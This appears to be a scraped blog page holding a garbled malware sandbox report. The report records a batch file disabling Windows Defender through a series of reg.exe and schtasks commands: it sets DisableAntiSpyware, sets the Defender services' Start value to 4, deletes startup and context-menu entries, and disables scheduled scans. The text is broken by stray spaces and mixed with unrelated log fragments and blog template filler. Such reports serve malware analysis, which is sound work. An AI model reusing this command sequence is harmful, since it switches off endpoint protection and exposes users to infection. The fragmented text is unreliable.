![]() Process created: C:\Windows \System32\ reg. Process created: C:\Windows \System32\ reg.exe RE G ADD 'HK LM\SOFTWAR E\Policies \Microsoft \Windows D efender' / v DisableA ntiSpyware /t REG_DW ORD /d 1 / f ![]() Process created: C:\Windows \System32\ reg.exe re g add 'HK LM\System\ CurrentCon trolSet\Se rvices\Sec urityHealt hService' /v 'Start' /t REG_DW ORD /d '4' /f Process created: C:\Windows \System32\ reg.exe re g add 'HK LM\System\ CurrentCon trolSet\Se rvices\Win Defend' /v 'Start' / t REG_DWOR D /d '4' / f system HKeyLocalMachineSYSTEMCurrentControlSetControlWMIAutologgerCircular. Process created: C:\Windows \System32\ reg.exe re g add 'HK LM\System\ CurrentCon trolSet\Se rvices\WdN isSvc' /v 'Start' /t REG_DWORD /d '4' /f Log Name: Microsoft-Windows-Kernel-EventTracing/Admin Source: Jul 29. Process created: C:\Windows \System32\ reg.exe re g add 'HK LM\System\ CurrentCon trolSet\Se rvices\WdN isDrv' /v 'Start' /t REG_DWORD /d '4' /f Process created: C:\Windows \System32\ reg.exe re g add 'HK LM\System\ CurrentCon trolSet\Se rvices\WdF ilter' /v 'Start' /t REG_DWORD /d '4' /f Process created: C:\Windows \System32\ reg.exe re g add 'HK LM\System\ CurrentCon trolSet\Se rvices\WdB oot' /v 'S tart' /t R EG_DWORD / d '4' /f Process created: C:\Windows \System32\ reg.exe re g delete 'HKCR\Driv e\shellex\ ContextMen uHandlers\ EPP' /f ![]() Process created: C:\Windows \System32\ reg.exe re g delete 'HKCR\Dire ctory\shel lex\Contex tMenuHandl ers\EPP' / f Process created: C:\Windows \System32\ reg.exe re g delete 'HKCR\*\sh ellex\Cont extMenuHan dlers\EPP' /f Process created: C:\Windows \System32\ reg.exe re g delete 'HKLM\Soft ware\Micro soft\Windo ws\Current Version\Ru n' /v 'Win dowsDefend er' /f Process created: C:\Windows \System32\ reg.exe re g delete 'HKCU\Soft ware\Micro soft\Windo ws\Current Version\Ru n' /v 'Win dows Defen der' /f Process created: C:\Windows \System32\ reg.exe re g delete 'HKLM\Soft ware\Micro soft\Windo ws\Current Version\Ex plorer\Sta rtupApprov ed\Run' /v 'Windows Defender' /f Process created: C:\Windows \System32\ schtasks.e xe schtask s /Change /TN 'Micr osoft\Wind ows\Window s Defender \Windows D efender Ve rification ' /Disable Process created: C:\Windows \System32\ schtasks.e xe schtask s /Change /TN 'Micr osoft\Wind ows\Window s Defender \Windows D efender Sc heduled Sc an' /Disab le Process created: C:\Windows \System32\ schtasks.e xe schtask s /Change /TN 'Micr osoft\Wind ows\Window s Defender \Windows D efender Cl eanup' /Di sable ![]() Process created: C:\Windows \System32\ schtasks.e xe schtask s /Change /TN 'Micr osoft\Wind ows\Window s Defender \Windows D efender Ca che Mainte nance' /Di sable Process created: C:\Windows \System32\ schtasks.e xe schtask s /Change /TN 'Micr osoft\Wind ows\Exploi tGuard\Exp loitGuard MDM policy Refresh' /Disable Process created: C:\Windows \System32\ reg.exe re g add 'HK LM\System\ CurrentCon trolSet\Co ntrol\WMI\ Autologger \DefenderA uditLogger ' /v 'Star t' /t REG_ DWORD /d ' 0' /f ![]() Process created: C:\Windows \System32\ conhost.ex e C:\Windo ws\system3 2\conhost. Key opened: HKEY_LOCAL _MACHINE\S oftware\Po licies\Mic rosoft\Win dows\Safer \CodeIdent ifiers Process created: C:\Windows \System32\ cmd.exe C: \Windows\s ystem32\cm d.exe /c ' 'C:\Users\ user\Deskt op\fed2.ba t' ' Mutant created: \Sessions\ 1\BaseName dObjects\L ocal\SM0:5 800:120:Wi lError_01 Source: C:\Windows \System32\ conhost.ex e Process created: C:\Windows \System32\ reg.exe re g add 'HK LM\System\ CurrentCon trolSet\Co ntrol\WMI\ Autologger \DefenderA piLogger' /v 'Start' /t REG_DW ORD /d '0' /fĬlassification label: mal52.evad mutexes Uses reg.exe to modify the Windows registry ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |